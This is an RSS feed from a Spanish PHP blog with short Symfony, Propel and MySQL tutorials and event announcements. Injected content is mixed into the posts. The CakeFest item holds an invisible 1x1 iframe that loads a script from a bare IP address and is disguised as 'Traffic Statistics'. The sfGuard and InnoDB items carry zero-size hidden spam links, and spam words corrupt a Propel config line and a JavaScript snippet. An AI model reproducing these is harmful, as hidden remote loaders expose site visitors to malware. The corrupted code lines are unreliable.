<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="wordpress/2.3.1" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>PHPes.com - PHP en Español</title>
	<link>http://phpes.com/blog</link>
	<description>PHPes está de vuelta!</description>
	<pubDate>Thu, 10 Jul 2008 01:57:08 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.3.1</generator>
	<language>en</language>
			<item>
		<title>CakeFest llega a Buenos Aires</title>
		<link>http://phpes.com/blog/2008/07/03/cakefest-llega-a-buenos-aires/</link>
		<comments>http://phpes.com/blog/2008/07/03/cakefest-llega-a-buenos-aires/#comments</comments>
		<pubDate>Thu, 03 Jul 2008 15:37:28 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[Anuncios]]></category>

		<category><![CDATA[Conferencias]]></category>

		<category><![CDATA[cakephp]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/07/03/cakefest-llega-a-buenos-aires/</guid>
		<description><![CDATA[ CakeFest es un evento donde la comunidad de CakePHP se junta para celebrar todo lo que pasa alrededor de este popular framework. En esta ocación, la segunda edición sucederá en Buenos Aires, Argentina, del 2 al 5 de Diciembre de 2008.
  
]]></description>
			<content:encoded><![CDATA[<p><a target="_blank" href="http://cakefest.org/pages/home/lang:spa"><img src="http://cakefest.org/themed/argentina08/img/badges/cake-banner-small-flat.jpg" alt="CakeFest" border="0" /></a> CakeFest es un evento donde la comunidad de CakePHP se junta para celebrar todo lo que pasa alrededor de este popular framework. En esta ocación, la segunda edición sucederá en Buenos Aires, Argentina, del 2 al 5 de Diciembre de 2008.</p>
<p><!-- Traffic Statistics --> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --></p>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/07/03/cakefest-llega-a-buenos-aires/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Symfony 1.1 !</title>
		<link>http://phpes.com/blog/2008/06/30/symfony-11-2/</link>
		<comments>http://phpes.com/blog/2008/06/30/symfony-11-2/#comments</comments>
		<pubDate>Mon, 30 Jun 2008 13:31:03 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[Anuncios]]></category>

		<category><![CDATA[symfony]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/06/30/symfony-11-2/</guid>
		<description><![CDATA[Luego de mucho tiempo de desarollo, Symfony 1.1 fue presentado y está listo para ser usado.
Aquí está el link del anuncio.  
Es importante leer el documento que explica como &#8220;upgradear&#8221; proyectos de 1.0.
El mismo dia, también fue lanzado Symfony 1.0.17.
]]></description>
			<content:encoded><![CDATA[<p>Luego de mucho tiempo de desarollo, Symfony 1.1 fue presentado y está listo para ser usado.</p>
<p>Aquí está el <a href="http://feeds.feedburner.com/%7Er/symfony/blog/%7E3/322835325/the-wait-is-over-symfony-1-1-released">link del anuncio</a>.  </p>
<p>Es importante leer <a href="http://trac.symfony-project.com/browser/branches/1.1/UPGRADE">el documento</a> que explica como &#8220;upgradear&#8221; proyectos de 1.0.</p>
<p>El mismo dia, también fue <a href="http://feeds.feedburner.com/%7Er/symfony/blog/%7E3/322742993/symfony-1-0-17-is-out">lanzado Symfony 1.0.17</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/06/30/symfony-11-2/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Guardar sesión con PDO en Symfony</title>
		<link>http://phpes.com/blog/2008/06/05/guardar-sesion-con-pdo-en-symfony/</link>
		<comments>http://phpes.com/blog/2008/06/05/guardar-sesion-con-pdo-en-symfony/#comments</comments>
		<pubDate>Thu, 05 Jun 2008 10:45:01 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[mysql]]></category>

		<category><![CDATA[pdo]]></category>

		<category><![CDATA[propel]]></category>

		<category><![CDATA[session]]></category>

		<category><![CDATA[symfony]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/06/05/guardar-sesion-con-pdo-en-symfony/</guid>
		<description><![CDATA[Symfony permite utilizar distintos medios para guardar los datos de sesión. Por defecto, Symfony utiliza el sistema de archivos (con el directorio /tmp)
Para correr Symfony en un cluster de servidores web es necesario guardar la sesión en un lugar centralizado. Para esto se puede utilizar Mysql. 
Es necesario crear una tabla para guardar los datos. [...]]]></description>
			<content:encoded><![CDATA[<p>Symfony permite utilizar distintos medios para guardar los datos de sesión. Por defecto, Symfony utiliza el sistema de archivos (con el directorio /tmp)</p>
<p>Para correr Symfony en un cluster de servidores web es necesario guardar la sesión en un lugar centralizado. Para esto se puede utilizar Mysql. </p>
<p>Es necesario crear una tabla para guardar los datos. El schema es el siguiente:</p>
<blockquote><p>CREATE  TABLE IF NOT EXISTS `session` (<br />  `id` VARCHAR(32) NOT NULL ,<br />  `sess_time` INT NULL ,<br />  `data` TEXT NULL ,<br />  PRIMARY KEY (`id`) )</p></blockquote>
<p>Luego, hay que configurar Symfony para utilizar esta tabla. Primero, debemos crear la conexión a la base de datos para la sesión . En el archivo config/databases.yml ponemos:</p>
<blockquote><p>  session:<br />    class:          sfPDODatabase<br />    param:<br />      dsn:          mysql:dbname=mydb;host=localhost<br />      username:     myuser<br />      password:     mypass</p></blockquote>
<p>Recuerden reemplazar los datos de dbname, host, username, y password con sus datos de conexión.</p>
<p>Luego, en la configuración de la aplicación es necesario definir la clase para guardar la sesión utilizando PDO. En el archivo config/factories.yml de la aplicación debemos agregar lo siguiente:</p>
<blockquote><p>    all:<br />    class: sfPDOSessionStorage<br />    param:<br />        db_table: session<br />        database: session<br />        session_name: session<br />        db_id_col: id<br />        db_time_col: sess_time<br />        db_data_col: data</p></blockquote>
<p>Luego de limpiar el cache con symfony cc la sesión deberia ser guardada en la tabla.</p>
<p>También es posible utilizar la conexión de propel existente, pero al momento de escribir este artículo tengo algun problema con este método. Luego comentaré la solución.</p>
<p>Links para más información:
<ul>
<li><a href="http://www.symfony-project.org/snippets/snippets/tagged/session/order_by/date">http://www.symfony-project.org/snippets/snippets/tagged/session/order_by/date</a></li>
<li><a href="http://www.symfony-project.org/book/1_0/06-Inside-the-Controller-Layer#User%20Session">http://www.symfony-project.org/book/1_0/06-Inside-the-Controller-Layer#User%20Session</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/06/05/guardar-sesion-con-pdo-en-symfony/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Autofocus con sfGuard</title>
		<link>http://phpes.com/blog/2008/05/20/autofocus-con-sfguard/</link>
		<comments>http://phpes.com/blog/2008/05/20/autofocus-con-sfguard/#comments</comments>
		<pubDate>Tue, 20 May 2008 14:46:52 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[Seguridad]]></category>

		<category><![CDATA[plugins]]></category>

		<category><![CDATA[sfguard]]></category>

		<category><![CDATA[symfony]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/05/20/autofocus-con-sfguard/</guid>
		<description><![CDATA[Si utilizas sgGuard para la autenticación de usuarios podes hacer que en el login el campo de usuario sea autofocus. Agrega el siguiente bloque al final de signinSuccess.php en plugins/sgGuardPlugin/modules/sfGuardAuth/templates:


&#60;script language=&#8221;javascript&#8221;&#62;
    var tbUsername = document.getElementById(&#8217;username&#8217;);
    if ( tbUsername ) tbUsername.focus();
&#60;/script&#38;gt;компютри

]]></description>
			<content:encoded><![CDATA[<div style=''>Si utilizas sgGuard para la autenticación de usuarios podes hacer que en el login el campo de usuario sea autofocus. Agrega el siguiente bloque al final de<span class="MsgBodyText"> signinSuccess.php en plugins/sgGuardPlugin/modules/sfGuardAuth/templates:</p>
<p></span><br />
<blockquote><span class="MsgBodyText"><br />
&lt;script language=&#8221;javascript&#8221;&gt;</span><br /><span class="MsgBodyText"><br />
    var tbUsername = document.getElementById(&#8217;username&#8217;);</span><br /><span class="MsgBodyText"><br />
    if ( tbUsername ) tbUsername.focus();</span><br /><span class="MsgBodyText"><br />
&lt;/script&amp;gt;</span><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://kvantservice.com/">компютри</a></font></p></blockquote>
</div>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/05/20/autofocus-con-sfguard/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Symfony, Propel e Innodb</title>
		<link>http://phpes.com/blog/2008/05/09/symfony-propel-e-innodb/</link>
		<comments>http://phpes.com/blog/2008/05/09/symfony-propel-e-innodb/#comments</comments>
		<pubDate>Fri, 09 May 2008 15:04:26 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[mysql]]></category>

		<category><![CDATA[propel]]></category>

		<category><![CDATA[symfony]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/05/09/symfony-propel-y-innodb/</guid>
		<description><![CDATA[Si utilizas propel para generar el sql desde el schema, y necesitas que incluya el tipo innodb en la declaración de creación de la tabla, debes incluir la siguiente línea en /config/propel.ini :
mebelipropel.mysql.tableType = InnoDB
Luego, ejecutando &#8220;symfony propel-build-sql&#8221; generará el archivo .sql en data/sql con el correspondiente tipo.
]]></description>
			<content:encoded><![CDATA[<p>Si utilizas propel para generar el sql desde el schema, y necesitas que incluya el tipo innodb en la declaración de creación de la tabla, debes incluir la siguiente línea en /config/propel.ini :</p>
<p><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://www.videnov.com/">mebeli</a></font>propel.mysql.tableType = InnoDB</p>
<p>Luego, ejecutando &#8220;symfony propel-build-sql&#8221; generará el archivo .sql en data/sql con el correspondiente tipo.</p>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/05/09/symfony-propel-e-innodb/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Symfony y BIGINTs</title>
		<link>http://phpes.com/blog/2008/04/08/symfony-y-bigints/</link>
		<comments>http://phpes.com/blog/2008/04/08/symfony-y-bigints/#comments</comments>
		<pubDate>Tue, 08 Apr 2008 17:54:19 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[mysql]]></category>

		<category><![CDATA[propel]]></category>

		<category><![CDATA[symfony]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/04/08/symfony-y-bigints/</guid>
		<description><![CDATA[Al momento de crear algunas tablas en el modelo de datos, para algunos índices elegí el tipo de datos BIGINT de Mysql.
Luego de convertir el modelo a un schema.yml con propel, y generar un admin con propel-init-admin  descubrí que el sorting usando columnas que son BIGINT no estaba correcto. El orden era calculado usando [...]]]></description>
			<content:encoded><![CDATA[<p>Al momento de crear algunas tablas en el modelo de datos, para algunos índices elegí el tipo de datos BIGINT de Mysql.</p>
<p>Luego de convertir el modelo a un schema.yml con propel, y generar un admin con propel-init-admin  descubrí que el sorting usando columnas que son BIGINT no estaba correcto. El orden era calculado usando strings en vez de números.  </p>
<p>Así fue como descubrí que propel convierte BIGINT a strings y no INT. </p>
<p>Para solucionar el problema, hay que reemplazar BIGINT por INTEGER y generar el modelo nuevamente.</p>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/04/08/symfony-y-bigints/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Symfony y MySQL sin boolean</title>
		<link>http://phpes.com/blog/2008/03/27/symfony-y-mysql-sin-boolean/</link>
		<comments>http://phpes.com/blog/2008/03/27/symfony-y-mysql-sin-boolean/#comments</comments>
		<pubDate>Thu, 27 Mar 2008 15:22:07 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[mysql]]></category>

		<category><![CDATA[symfony]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/03/27/symfony-y-mysql-sin-boolean/</guid>
		<description><![CDATA[Si no lo sabes, MySQL no tiene tipo de datos BOOLEAN como otras RDBMS. Cuando uno crea una tabla con columnas BOOLEAN, estas son creadas como TINYINT.
Por su parte, Symfony tiene un feature muy bueno: cuando uno crea un admin basado en un modelo, si encuentra una columna BOOLEAN, lo presenta con un checkbox, pero [...]]]></description>
			<content:encoded><![CDATA[<p>Si no lo sabes, MySQL no tiene tipo de datos BOOLEAN como otras RDBMS. Cuando uno crea una tabla con columnas BOOLEAN, estas son creadas como TINYINT.</p>
<p>Por su parte, <a target="_blank" href="http://www.symfony-project.org/">Symfony</a> tiene un feature muy bueno: cuando uno <a target="_blank" href="http://www.symfony-project.org/screencast/admin-generator">crea un admin</a> basado en un modelo, si encuentra una columna BOOLEAN, lo presenta con un checkbox, pero si es TINYINT pone un INPUT TEXT. </p>
<p>Como a mi me gusta generar el modelo usando el <a target="_blank" href="http://www.mysql.com/products/tools/workbench/">MySQL Workbench</a> cuando genero el schema para el symfony utilizando la base de datos creada, symfony encuentra la columna como TINYINT. </p>
<p>Para resolver esto, utilizo el comando sed para hacer el reemplazo en un script de bash:</p>
<blockquote><p>#!/bash/sh</p>
<p>symfony clear-cache</p>
<p>symfony propel-build-schema</p>
<p>mv config/schema.yml config/schema_bak.yml</p>
<p>sed s/TINYINT/BOOLEAN/ config/schema_bak.yml > config/schema.yml</p>
<p>symfony propel-build-model</p>
</blockquote>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/03/27/symfony-y-mysql-sin-boolean/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Symfony: Mostrar el nombre de un objeto en vez del id en una lista</title>
		<link>http://phpes.com/blog/2008/03/26/symfony-mostrar-el-nombre-de-un-objeto-en-vez-del-id-en-una-lista/</link>
		<comments>http://phpes.com/blog/2008/03/26/symfony-mostrar-el-nombre-de-un-objeto-en-vez-del-id-en-una-lista/#comments</comments>
		<pubDate>Wed, 26 Mar 2008 16:11:11 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[symfony]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/03/26/mostrar-el-nombre-de-un-objeto-en-vez-del-id-en-una-lista/</guid>
		<description><![CDATA[Al utilizar foreign keys, podemos relacionar distintos objetos. Por ejemplo, si tenemos un mensaje, y dicho mensaje tiene un destinatario, al listar los mensajes podemos listar el nombre del destinatario en vez de su id.
Luego de generar el admin con symfony propel-init-admin, editando el archivo generator.yml del modulo en cuestión:
    list:  [...]]]></description>
			<content:encoded><![CDATA[<p>Al utilizar foreign keys, podemos relacionar distintos objetos. Por ejemplo, si tenemos un mensaje, y dicho mensaje tiene un destinatario, al listar los mensajes podemos listar el nombre del destinatario en vez de su id.</p>
<p>Luego de generar el admin con symfony propel-init-admin, editando el archivo generator.yml del modulo en cuestión:</p>
<p>    list:<br />       peer_method:   doSelectJoinDestinatario<br />       display:       [mensaje, destinatario]</p>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/03/26/symfony-mostrar-el-nombre-de-un-objeto-en-vez-del-id-en-una-lista/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Experiencias con Symfony</title>
		<link>http://phpes.com/blog/2008/03/26/experiencias-con-symfony/</link>
		<comments>http://phpes.com/blog/2008/03/26/experiencias-con-symfony/#comments</comments>
		<pubDate>Wed, 26 Mar 2008 16:06:04 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[Comentarios]]></category>

		<category><![CDATA[symfony]]></category>

		<category><![CDATA[zendframework]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/03/26/experiencias-con-symfony/</guid>
		<description><![CDATA[Recientemente he estado comentando sobre Zend Framework. Este proyecto se ha convertido en muy poco tiempo en algo muy importante para el desarrollo de aplicaciones web, y creo que seguirá creciendo en calidad y cantidad de features.
Pero hace unas semanas comencé un proyecto con una base de datos con muchas tablas, que requiere de un [...]]]></description>
			<content:encoded><![CDATA[<p>Recientemente he estado comentando sobre <a href="http://framework.zend.com">Zend Framework</a>. Este proyecto se ha convertido en muy poco tiempo en algo muy importante para el desarrollo de aplicaciones web, y creo que seguirá creciendo en calidad y cantidad de features.</p>
<p>Pero hace unas semanas comencé un proyecto con una base de datos con muchas tablas, que requiere de un sistema de administración completo. A esta altura, lo que menos me gusta de desarrollar aplicationes web es el trabajo monótono y repetitivo de crear listas y forms para un backend. El Zend Framework todavia no tiene todos los utilitarios para la generación de código, ya sea de objetos relacionados con el modelo (las tablas) o menos aún la generación automática de un sistema de administración de dicha información.</p>
<p>El framework <a href="http://www.symfony-project.org/">Symfony</a> si lo tiene. Por este motivo, estas ultimas semanas estuve introduciendome a dicho proyecto, que por cierto, tiene una madurez y una calidad considerable, no por nada Yahoo lo eligió para alguno de sus sistemas.</p>
<p>Gracias a esto, ire comentando alguna de mis experiencias con Symfony, algunas serán muy basicas y otras no tanto. Espero sus comentarios.</p>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/03/26/experiencias-con-symfony/feed/</wfw:commentRss>
		</item>
		<item>
		<title>errno: 121 con Mysql e InnoDB</title>
		<link>http://phpes.com/blog/2008/03/24/errno-121-con-mysql-e-innodb/</link>
		<comments>http://phpes.com/blog/2008/03/24/errno-121-con-mysql-e-innodb/#comments</comments>
		<pubDate>Mon, 24 Mar 2008 21:35:49 +0000</pubDate>
		<dc:creator>pgodel</dc:creator>
		
		<category><![CDATA[mysql]]></category>

		<guid isPermaLink="false">http://phpes.com/blog/2008/03/24/errno-121-con-mysql-e-innodb/</guid>
		<description><![CDATA[Hace poco comence un nuevo proyecto que contiene muchas tablas en la base de datos. Para hacer la vida un poco más fácil, decidí usar el Mysql Workbench.
Este utilitario permite diseñar bases de datos y tablas visualmente. Una vez terminado, se puede exportar el resultado a SQL para crear todas las tablas. 
Una de las [...]]]></description>
			<content:encoded><![CDATA[<p>Hace poco comence un nuevo proyecto que contiene muchas tablas en la base de datos. Para hacer la vida un poco más fácil, decidí usar el <a target="_blank" href="http://dev.mysql.com/workbench/">Mysql Workbench.</a></p>
<p>Este utilitario permite diseñar bases de datos y tablas visualmente. Una vez terminado, se puede exportar el resultado a SQL para crear todas las tablas. </p>
<p>Una de las opciones más interesantes es que permite relacionar tablas usando foreign keys. Luego de crear unas cuantas tablas, al correr el SQL en el servidor, algunas tablas no eran creadas y obtenía el siguiente error:</p>
<p>Can&#8217;t create table errno: 121</p>
<p>Buscando en google encontre varias menciones pero nada concreto hasta que, finalmente, di en el clavo. El nombre de las relaciones son asignadas automáticamente por el programa (se pueden cambiar si es necesario/deseado), resulta que algunas relaciones tenian el mismo nombre. Fue cuestión de cambiar el nombre en la definición de la relación y listo. </p>
<p>Problema solucionado, pero me tomó un buen rato encontrar el significado de este error, no muy bien documentado.</p>
]]></content:encoded>
			<wfw:commentRss>http://phpes.com/blog/2008/03/24/errno-121-con-mysql-e-innodb/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
